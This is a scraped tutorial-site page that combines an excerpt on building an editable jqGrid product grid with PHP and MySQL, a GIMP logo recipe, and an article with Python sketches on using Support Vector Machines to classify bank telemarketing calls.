If you prefer to type the code yourself, you'll find a complete step-by-step exercise a bit later in this article. Before then, though, let's quickly review what our grid is made of. We'll review the code in greater detail at the end of this article.
The editable grid feature is made up of a few components:

- product.sql is the script that creates the grid database
- config.php and error_handler.php are our standard helper scripts
- grid.php and grid.class.php make up the server-side functionality
- index.html contains the client-side part of our project
- The scripts folder contains the jQuery scripts that we use in index.html

Figure 9-3: The components of the AJAX grid

The database

Our editable grid displays a fictional database of products. On the server side, we store the data in a table named product, which contains the following fields:

- product_id: A unique number automatically generated by auto-increment in the database and used as the Primary Key
- name: The actual name of the product
- price: The price of the product for sale
- on_promotion: A numeric field that we use to store 0/1 (or true/false) values. In the user interface, the value is expressed via a checkbox

The Primary Key is defined as product_id; because this value will be unique for each product, it is a logical choice. This field cannot be empty and is set to auto-increment as entries are added to the database:

    CREATE TABLE product(
      product_id    INT UNSIGNED NOT NULL AUTO_INCREMENT,
      name          VARCHAR(50) NOT NULL DEFAULT '',
      price         DECIMAL(10,2) NOT NULL DEFAULT '0.00',
      on_promotion  TINYINT NOT NULL DEFAULT '0',
      PRIMARY KEY (product_id)
    );

The other fields are rather self-explanatory: none of the fields may be left empty, and each field, with the exception of product_id, has been assigned a default value. The on_promotion field is set to TINYINT, as it only needs to hold a true (1) or false (0) value; it will be shown as a checkbox in our grid that the user can simply set on or off.

Styles and colors

Leaving the database aside, it's useful to look at the more pertinent and immediate aspects of the application code to get a general overview of what's going on here.
We mentioned earlier that the look of the grid is controlled through CSS. Looking at the index.html file's head region, we find the following code:

    <link rel="stylesheet" type="text/css" href="scripts/themes/coffee/grid.css" title="coffee" media="screen" />
    <link rel="stylesheet" type="text/css" media="screen" href="themes/jqModal.css" />

Several themes have been included in the themes folder; coffee is the theme used in the code above. To change the look of the entire grid, you need only replace the theme name with another theme's name, green, for example. You can create a custom theme by creating your own images for the grid (following the naming convention of the existing images), collecting them in a folder under the themes folder, and changing this line to reflect your new theme name. There is one exception, though, and it affects which buttons will be used. The buttons' appearance is controlled by imgpath: 'scripts/themes/green/images', found in index.html; you must alter this to reflect the path to the proper theme. Changing the theme name in two different places is error prone, so we should do it carefully. By using jQuery and a nifty trick, we will be able to define the theme as a simple variable: the CSS file will be loaded dynamically based on the current theme, and imgpath will also be composed dynamically. The nifty trick involves dynamically creating the <link> tag inside head and setting its href attribute to the chosen theme. Changing the current theme then simply consists of changing the theme JavaScript variable.

jqModal.css controls the style of our pop-up or overlay window and is part of the jqModal plugin. (Its functionality is controlled by the file jqModal.js found in the scripts/js folder.)
You can find the plugin and its associated CSS file at: http://dev.iceburg.net/jquery/jqModal/

In addition, in the head region of index.html, there are several script src declarations for the files used to build the grid (and jqModal.js for the overlay):

    <script src="scripts/jquery-1.3.2.js" type="text/javascript"></script>
    <script src="scripts/jquery.jqGrid.js" type="text/javascript"></script>
    <script src="scripts/js/jqModal.js" type="text/javascript"></script>
    <script src="scripts/js/jqDnR.js" type="text/javascript"></script>

A number of files are used to make our grid function, and we will talk about these scripts in more detail later. Looking at the body of our index page, we find the declaration of the table that will house our grid and the code for getting the grid on the page and populating it with our product data:

    <script type="text/javascript">
    var lastSelectedId;
    $('#list').jqGrid({
        url: 'grid.php',        // name of our server-side script
        datatype: 'json',
        mtype: 'POST',          // specifies whether to use POST or GET
        // define the columns the grid should expect to use (table columns)
        colNames: ['ID', 'Name', 'Price', 'Promotion'],
        // define the data of each column and whether it is editable
        colModel: [
            {name: 'product_id', index: 'product_id', width: 55, editable: false},
            // editable text data
            {name: 'name', index: 'name', width: 100, editable: true,
             edittype: 'text', editoptions: {size: 30, maxlength: 50}},
            // editable currency
            {name: 'price', index: 'price', width: 80, align: 'right',
             formatter: 'currency', editable: true},
            // true/false checkbox for on_promotion
            {name: 'on_promotion', index: 'on_promotion', width: 80,
             formatter: 'checkbox', editable: true, edittype: 'checkbox'}
        ],
        // define how pages are displayed and paged
        rowNum: 10,
        rowList: [5, 10, 20, 30],
        imgpath: 'scripts/themes/green/images',
        pager: $('#pager'),
        sortname: 'product_id',  // initially sorted on product_id
        viewrecords: true,
        sortorder: 'desc',
        caption: 'JSON Example',
        width: 600,
        height: 250,
        // when a row is selected, restore the previous one and edit the new one
        onSelectRow: function (id) {
            if (id && id !== lastSelectedId) {
                $('#list').restoreRow(lastSelectedId);
                $('#list').editRow(id, true, null, onSaveSuccess);
                lastSelectedId = id;
            }
        },
        // URL to call for saving edits
        editurl: 'grid.php?action=save'
    });

    // indicate if/when the save was successful (the server answers 1 on success)
    function onSaveSuccess(xhr) {
        var response = xhr.responseText;
        return response == 1;
    }
    </script>
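The grid above posts its requests to grid.php and expects JSON back, but the PHP code is not reproduced in this excerpt. As a hedged illustration (written in Python rather than PHP, and not the authors' grid.php), the sketch below builds one page of data in the shape of jqGrid's default JSON reader: `page`, `total`, `records`, and `rows`, where each row carries an `id` and a `cell` array ordered like colModel. It assumes jqGrid's default request parameters `page`, `rows`, `sidx`, and `sord`; the product rows are made up, and the helper name `grid_page` is hypothetical.

```python
import json
import math
from typing import Any, Dict, List

# Hypothetical in-memory stand-in for the product table.
PRODUCTS: List[Dict[str, Any]] = [
    {"product_id": i, "name": f"Product {i}", "price": 10.0 * i, "on_promotion": i % 2}
    for i in range(1, 13)
]

# Same order as colNames/colModel in index.html.
COLUMNS = ["product_id", "name", "price", "on_promotion"]


def grid_page(products: List[Dict[str, Any]], page: int, rows: int,
              sidx: str = "product_id", sord: str = "desc") -> Dict[str, Any]:
    """Return one page of rows in the default jqGrid JSON reader layout."""
    records = len(products)
    total = math.ceil(records / rows) if records > 0 else 0
    # Clamp the requested page into the valid range (page 1 when there is no data).
    page = min(max(page, 1), max(total, 1))
    ordered = sorted(products, key=lambda p: p[sidx], reverse=(sord == "desc"))
    start = (page - 1) * rows
    chunk = ordered[start:start + rows]
    return {
        "page": page,
        "total": total,
        "records": records,
        "rows": [{"id": p["product_id"], "cell": [p[c] for c in COLUMNS]} for p in chunk],
    }


# Second page of 10 rows, sorted by product_id descending (the grid's initial settings).
response = grid_page(PRODUCTS, page=2, rows=10)
print(json.dumps(response))
```

With 12 products and rowNum set to 10, the second page holds only the two lowest IDs, which is what the pager's "viewrecords" text would report. On the save path, the client's onSaveSuccess only checks that the response body equals 1, so a save handler would echo 1 on success.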


How-To Tutorials

article-image-getting-started-android-things

Packt

21 Jul 2017

16 min read

Getting Started with Android Things


Packt

06 Apr 2011

3 min read

Creating a quick logo for a company with GIMP 2.6

How to do it...

We can go about creating our logo by carrying out the following steps:

1. In a new file, using the Text Tool, write the name of the company. Pick a font and a size, and place the text a little above the middle of the canvas.
2. Lock the layer by selecting it and clicking the Lock checkbox, to avoid accidentally making changes to it:
3. Create a new gradient by clicking on the + button at the bottom of the Gradients dialog. If the dialog is not visible, open it by using Ctrl + G, or go to Windows | Dockable Dialogs | Gradients:
4. To pick the colors for the gradient, position the mouse over the orange bar (blue in Windows) and right-click:
5. Select Left Endpoint's Color: and/or Right Endpoint's Color: Here are the colors I have chosen:
6. Using the Blend Tool, apply the gradient:
7. Right-click on the text layer's name in the Layers dialog, and select the Alpha to Selection option:
8. Then, go to Select | Grow, and make the selection bigger by 3 pixels:
9. Create a new layer and name it border. Fill it using the Bucket Fill Tool (I used a dark color), and place it underneath the text layer (drag and drop the border layer):
10. Duplicate the border layer by clicking on the Duplicate button at the bottom of the Layers dialog, or by going to Layer | Duplicate Layer. Repeat this operation with the text layer.
11. Move this last duplicated layer on top of the border copy layer. Merge these duplicated layers by going to Layer | Merge Down, and change the name of the result to reflection:
12. Choose Select | None from the menu to be sure there's no selection present.
13. Using the Move Tool, place the reflection layer below the text layer and flip it with the Flip Tool. Use the Move Tool to adjust the position of the flipped text, and separate the two vertically by just a few pixels.
14. Right-click on the reflection layer inside the Layers dialog, and select the Add Layer Mask option. Choose Black (full transparency) and click Add.
15. Using the Blend Tool, pick the FG to BG gradient from the Gradients dialog, and apply it from the bottom to the top to create a semitransparent reflection of the text:
16. Select the original text layer. Right-click on it in the Layers dialog, and choose Alpha to Selection.
17. Then, with the Ellipse Select Tool in subtract mode (check the following image), draw an ellipse, as in the following image:
18. Create a new layer and name it glass. Then, fill it with white using the Bucket Fill Tool:
19. Change its opacity to around 30 and you are done! Here's the final logo:

How it works...

Just by using a font you like and a few tools, you quickly created a logo. See how we only used the default paint/blend tools and masks to create it? GIMP has powerful extensions, but you can also create professional pieces without using complex filters or spending much time.

Summary

This article showed us how to use a few basic tools and layer masks to create a company logo.

Further resources on this subject: Photo Manipulation with GIMP 2.6 [Article] How To Create Amazing Text and Font Effects in Gimp 2.6 [Article] Creating Pseudo-3D Imagery with GIMP [Article] Blender 2.5: Creating a UV Texture [Article] Python Graphics: Combining Raster and Vector Pictures [Article] Open Source Awards 2010: Gimp [Article]


How-To Tutorials

article-image-shipping-and-tax-calculations-php-5-ecommerce

Packt

20 Jan 2010

8 min read

Shipping and Tax Calculations with PHP 5 Ecommerce


article-image-grunt-makes-it-easy-to-test-and-optimize-your-website-heres-how-tutorial

Sugandha Lahoti

18 Jun 2018

17 min read

Grunt makes it easy to test and optimize your website. Here's how. [Tutorial]


How-To Tutorials

article-image-support-vector-machines-classification-engine

Packt

17 Mar 2016

9 min read

Support Vector Machines as a Classification Engine

In this article by Tomasz Drabas, author of the book Practical Data Analysis Cookbook, we will discuss how Support Vector Machine models can be used as a classification engine.

Support Vector Machines

Support Vector Machines (SVMs) are a family of extremely powerful models that can be used in classification and regression problems. They aim at finding decision boundaries that separate observations with differing class memberships. While many classifiers can classify linearly separable data (for example, logistic regression), SVMs can also handle highly non-linear problems using a kernel trick that implicitly maps the input vectors to higher-dimensional feature spaces. The transformation rearranges the dataset in such a way that it becomes linearly separable.

The mechanics of the machine

Given a set of n points of the form (x1, y1), ..., (xn, yn), where xi is a z-dimensional input vector and yi is a class label, the SVM aims at finding the maximum margin hyperplane that separates the data points:

In a two-dimensional dataset with linearly separable data points (as shown in the preceding figure), the maximum margin hyperplane would be a line that maximizes the distance to the nearest points of each class. The hyperplane can be expressed as the set of points x that satisfy w · x = b, where w is a vector normal to the hyperplane and b determines its offset from the origin of the coordinate system (the distance from the origin is |b|/||w||). To find the hyperplane, we solve the following optimization problem:

The constraint of our optimization problem effectively states that no point may fall on the wrong side of the hyperplane, or even inside the margin, given the class it belongs to.

Linear SVM

Building a linear SVM classifier in Python is easy.
There are multiple Python packages that can estimate a linear SVM, but here we decided to use MLPY (http://mlpy.sourceforge.net):

    import pandas as pd
    import numpy as np
    import mlpy as ml

First, we load the necessary modules that we will use later, namely pandas (http://pandas.pydata.org), NumPy (http://www.numpy.org), and the aforementioned MLPY. We use pandas to read the data (visit the https://github.com/drabastomek/practicalDataAnalysisCookbook repository to download the data):

    # the file name of the dataset
    r_filename = 'Data/Chapter03/bank_contacts.csv'

    # read the data
    csv_read = pd.read_csv(r_filename)

The dataset that we use was described in S. Moro, P. Cortez, and P. Rita. A data-driven approach to Predict the Success of Bank Telemarketing. Decision Support Systems, Elsevier, 62:22-31, June 2014 and can be found at http://archive.ics.uci.edu/ml/datasets/Bank+Marketing. It consists of over 41.1k outbound marketing calls of a bank. Our aim is to classify these calls into two buckets: those that resulted in a credit application and those that did not. Once the file is loaded, we split the data into training and testing datasets; we also keep the input and class indicator data separately. To this end, we use the split_data(...)
method:

    def split_data(data, y, x='All', test_size=0.33):
        '''
            Method to split the data into training and testing
        '''
        import numpy as np

        # dependent variable
        variables = {'y': y}

        # and all the independent
        if x == 'All':
            allColumns = list(data.columns)
            allColumns.remove(y)
            variables['x'] = allColumns
        else:
            if not isinstance(x, list):
                raise TypeError('The x parameter has to be a list...')
            variables['x'] = x

        # create a variable to flag the training sample
        data['train'] = np.random.rand(len(data)) < (1 - test_size)

        # split the data into training and testing
        train_x = data[data.train][variables['x']]
        train_y = data[data.train][variables['y']]
        test_x = data[~data.train][variables['x']]
        test_y = data[~data.train][variables['y']]

        return train_x, train_y, test_x, test_y, variables['x']

We randomly set roughly 1/3 of the dataset aside for testing purposes (each row lands in the test set with probability test_size) and use the remaining 2/3 to train the model:

    # split the data into training and testing
    train_x, train_y, test_x, test_y, labels = hlp.split_data(
        csv_read,
        y='credit_application'
    )

Once we read the data and split it into training and testing datasets, we can estimate the model:

    # create the classifier object
    svm = ml.LibSvm(svm_type='c_svc',
                    kernel_type='linear', C=100.0)

    # fit the data
    svm.learn(train_x, train_y)

The svm_type parameter of the .LibSvm(...) method controls which algorithm is used to estimate the SVM. Here, we use c_svc, a C-Support Vector Classifier. Its C parameter specifies how much you want to avoid misclassifying training observations: larger values of C shrink the margin of the hyperplane so that more of the training observations are correctly classified. You can also specify nu_svc with a nu parameter that sets an upper bound on the fraction of your sample that can be margin errors (misclassified or inside the margin) and a lower bound on the fraction of your observations that become support vectors. Here, we estimate an SVM with a linear kernel, so let's talk about kernels.
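Before moving to kernels, here is a minimal sketch of the C trade-off described above. In the hard-margin case the constraint is y_i(w · x_i - b) ≥ 1 for labels y_i in {-1, +1}; the C-SVC relaxes it with hinge-loss slack, giving the textbook primal objective 0.5·||w||² + C·Σ max(0, 1 - y_i(w · x_i - b)). LIBSVM, which mlpy's LibSvm wraps, solves the dual of this problem, so the code below is not what mlpy runs internally: it only evaluates the primal objective for two hand-picked hyperplanes on made-up 1-D data to show which one each value of C prefers.

```python
import math
from typing import Sequence


def decision_value(w: Sequence[float], b: float, x: Sequence[float]) -> float:
    """w . x - b: positive on one side of the hyperplane w . x = b, negative on the other."""
    return sum(wj * xj for wj, xj in zip(w, x)) - b


def soft_margin_objective(w, b, X, y, C: float) -> float:
    """Textbook C-SVC primal: 0.5 * ||w||^2 + C * sum of hinge losses (labels in {-1, +1})."""
    regularizer = 0.5 * sum(wj * wj for wj in w)
    hinge = sum(max(0.0, 1.0 - yi * decision_value(w, b, xi)) for xi, yi in zip(X, y))
    return regularizer + C * hinge


def margin_width(w: Sequence[float]) -> float:
    """Distance between the two margin boundaries w . x - b = +1 and w . x - b = -1."""
    return 2.0 / math.sqrt(sum(wj * wj for wj in w))


# Hypothetical 1-D data: two negatives and two positives.
X = [[-2.0], [-1.0], [0.2], [2.0]]
y = [-1, -1, 1, 1]

candidates = {
    "wide": ([1.0], 0.0),     # margin width 2.0, but x = 0.2 sits inside the margin
    "narrow": ([2.0], -0.8),  # margin width 1.0, no point inside the margin
}

for C in (0.1, 100.0):
    scores = {name: soft_margin_objective(w, b, X, y, C) for name, (w, b) in candidates.items()}
    best = min(scores, key=scores.get)
    print(f"C={C}: prefers the {best} hyperplane (margin {margin_width(candidates[best][0])})")
```

With a small C the wider margin wins despite the violating point; with C=100.0, as in the linear model above, the narrower margin that classifies every training point correctly wins.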
Kernels

A kernel function K effectively computes a dot product between two n-dimensional vectors in some (possibly higher-dimensional) feature space, K: R^n × R^n → R. In other words, the kernel function takes two vectors and produces a scalar:

The linear kernel does not transform the data into a higher-dimensional space. This is not true for polynomial or Radial Basis Function (RBF) kernels, which transform the input feature space into higher dimensions. In the case of the polynomial kernel of degree d, an n-dimensional input feature space is mapped to a feature space with C(n+d, d) = (n+d)!/(n! d!) dimensions. As you can see, the number of additional dimensions can grow very quickly, and this would pose significant problems in estimating the model if we were to explicitly transform the data into higher dimensions. Thankfully, we do not have to do this, and that's where the kernel trick comes into play. SVMs do not have to work explicitly in higher dimensions; instead, they implicitly map the data to higher dimensions by computing pairwise kernel values, which equal inner products in that space, and then use these to find the maximum margin hyperplane. You can find a really good explanation of the kernel trick at http://www.eric-kim.net/eric-kim-net/posts/1/kernel_trick.html.

Back to our example

The .learn(...) method of the .LibSvm(...) object estimates the model. Once the model is estimated, we can test how well it performs.
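To make the kernel trick from the Kernels section concrete, the sketch below checks numerically that a homogeneous degree-2 polynomial kernel, (a · b)², equals an ordinary dot product after an explicit map of 2-D vectors to three features, so the map never has to be computed. It also counts the C(n+d, d) dimensions mentioned above (that count covers all monomials up to degree d, the feature space of the inhomogeneous kernel (a · b + 1)^d) and evaluates the RBF kernel used later in the article. All function names are illustrative; this is not mlpy's or LIBSVM's code.

```python
import math
from typing import Sequence, Tuple


def dot(a: Sequence[float], b: Sequence[float]) -> float:
    return sum(ai * bi for ai, bi in zip(a, b))


def poly2_kernel(a: Sequence[float], b: Sequence[float]) -> float:
    """Homogeneous degree-2 polynomial kernel: K(a, b) = (a . b)^2."""
    return dot(a, b) ** 2


def poly2_features(v: Sequence[float]) -> Tuple[float, float, float]:
    """Explicit map for 2-D input whose dot product reproduces poly2_kernel."""
    v1, v2 = v
    return (v1 * v1, math.sqrt(2.0) * v1 * v2, v2 * v2)


def rbf_kernel(a: Sequence[float], b: Sequence[float], sigma: float = 1.0) -> float:
    """RBF kernel: exp(-||a - b||^2 / (2 * sigma^2))."""
    sq_dist = sum((ai - bi) ** 2 for ai, bi in zip(a, b))
    return math.exp(-sq_dist / (2.0 * sigma ** 2))


def poly_feature_dims(n: int, d: int) -> int:
    """Number of monomials of degree <= d in n variables: C(n + d, d)."""
    return math.comb(n + d, d)


x, z = (1.0, 2.0), (3.0, -1.0)
# Kernel value vs. dot product of the explicit features: both are 1.0 up to rounding.
print(poly2_kernel(x, z), dot(poly2_features(x), poly2_features(z)))
# Feature-space size explodes with the input dimension: 6 and 176851.
print(poly_feature_dims(2, 2), poly_feature_dims(100, 3))
# RBF is 1 for identical vectors and decays toward 0 with distance.
print(rbf_kernel(x, x), rbf_kernel(x, (100.0, 100.0)))
```

The kernel computation costs one dot product in the original space, while the explicit map for n = 100 and d = 3 would already need 176,851 coordinates per observation.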
First, we use the estimated model to predict the classes for the observations in the testing dataset:

    predicted_l = svm.pred(test_x)

Next, we will use some of the scikit-learn methods to print the basic statistics for our model:

    def printModelSummary(actual, predicted):
        '''
            Method to print out model summaries
        '''
        import sklearn.metrics as mt

        print('Overall accuracy of the model is {0:.2f} percent'
            .format(
                (actual == predicted).sum() / len(actual) * 100))
        print('Classification report: \n',
            mt.classification_report(actual, predicted))
        print('Confusion matrix: \n',
            mt.confusion_matrix(actual, predicted))
        print('ROC: ', mt.roc_auc_score(actual, predicted))

First, we calculate the overall accuracy of the model, expressed as the ratio of properly classified observations to the total number of observations in the testing sample. Next, we print the classification report:

The precision is the model's ability to avoid classifying an observation as positive when it is not. It is the ratio of true positives to the overall number of positively classified records. The overall precision score is a weighted average of the individual precision scores, where the weight is the support. The support is the total number of actual observations in each class. The total precision for our model is not too bad: 89 out of 100. However, when we look at the precision for the positive class, the situation is not as good: only 63 out of every 100 calls classified as positive actually were positive. Recall can be viewed as the model's capacity to find all the positive samples. It is the ratio of true positives to the sum of true positives and false negatives. The recall for the class 0.0 is almost perfect, but for class 1.0 it looks really bad. This might stem from the fact that our sample is not balanced, but it is more likely that the features we use to classify the data do not really capture the differences between the two groups.
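The definitions above can be checked by hand. The sketch below is a hedged re-implementation of the formulas as stated in the text (it is not scikit-learn's code): it counts true/false positives and negatives for a chosen positive class, then derives accuracy, precision, recall, and the f1-score (twice the product of precision and recall divided by their sum). The labels are made up and deliberately unbalanced, mirroring the situation described for the bank data.

```python
from typing import Dict, Sequence, Tuple


def confusion_counts(actual: Sequence[float], predicted: Sequence[float],
                     positive: float = 1.0) -> Tuple[int, int, int, int]:
    """Return (tp, fp, fn, tn), treating `positive` as the positive class."""
    tp = fp = fn = tn = 0
    for a, p in zip(actual, predicted):
        if p == positive:
            if a == positive:
                tp += 1
            else:
                fp += 1
        else:
            if a == positive:
                fn += 1
            else:
                tn += 1
    return tp, fp, fn, tn


def summarize(actual: Sequence[float], predicted: Sequence[float],
              positive: float = 1.0) -> Dict[str, float]:
    tp, fp, fn, tn = confusion_counts(actual, predicted, positive)
    accuracy = (tp + tn) / len(actual)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return {"accuracy": accuracy, "precision": precision, "recall": recall, "f1": f1}


# Hypothetical, unbalanced labels: 8 negatives (0.0) and 2 positives (1.0).
actual = [0.0] * 8 + [1.0, 1.0]
predicted = [0.0] * 7 + [1.0] + [1.0, 0.0]

print(summarize(actual, predicted))                # class 1.0 as the positive class
print(summarize(actual, predicted, positive=0.0))  # class 0.0 as the positive class
```

Here overall accuracy is 0.8 and class 0.0 scores 0.875 on precision and recall, yet the minority class only reaches 0.5 on each, which is the pattern the classification report reveals for the linear SVM.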
The f1-score combines precision and recall into a single number: it is their harmonic mean, that is, twice the product of precision and recall divided by their sum. In one measure, it shows whether the model performs well or not. At the general level, the model does not perform badly, but when we look at the model's ability to classify the true signal, it fails gravely. It is a perfect example of why judging a model at the general level might be misleading when dealing with heavily unbalanced samples.

RBF kernel SVM

Given that the linear kernel performed poorly, our dataset might not be linearly separable. Thus, let's try the RBF kernel. The RBF kernel is given as K(x, y) = exp(-||x - y||^2 / (2σ^2)), where ||x - y||^2 is the squared Euclidean distance between the two vectors, x and y, and σ is a free parameter. The value of the RBF kernel equals 1 when x = y and gradually falls to 0 as the distance approaches infinity. To fit an RBF version of our model, we can specify our svm object as follows:

    svm = ml.LibSvm(svm_type='c_svc', kernel_type='rbf',
                    gamma=0.1, C=1.0)

The gamma parameter here specifies how far the influence of a single support vector reaches; in LIBSVM's parameterization the kernel is written as exp(-gamma ||x - y||^2), so gamma plays the role of 1/(2σ^2). You can visually investigate the relationship between the gamma and C parameters at http://scikit-learn.org/stable/auto_examples/svm/plot_rbf_parameters.html. The rest of the code for the model estimation follows in a similar fashion as with the linear kernel, and we obtain the following results:

The results are even worse than with the linear kernel: precision and recall dropped across the board. The SVM with the RBF kernel performed worse when classifying both the calls that resulted in applying for the credit card and those that did not.

Summary

In this article, we saw that the problem is not with the model; rather, the dataset that we use does not explain the variance sufficiently. This requires going back to the drawing board and selecting other features.
Resources for Article: Further resources on this subject: Push your data to the Web [article] Transferring Data from MS Access 2003 to SQL Server 2008 [article] Exporting data from MS Access 2003 to MySQL [article]


Packt

30 Aug 2013

13 min read

Managing a Hadoop Cluster


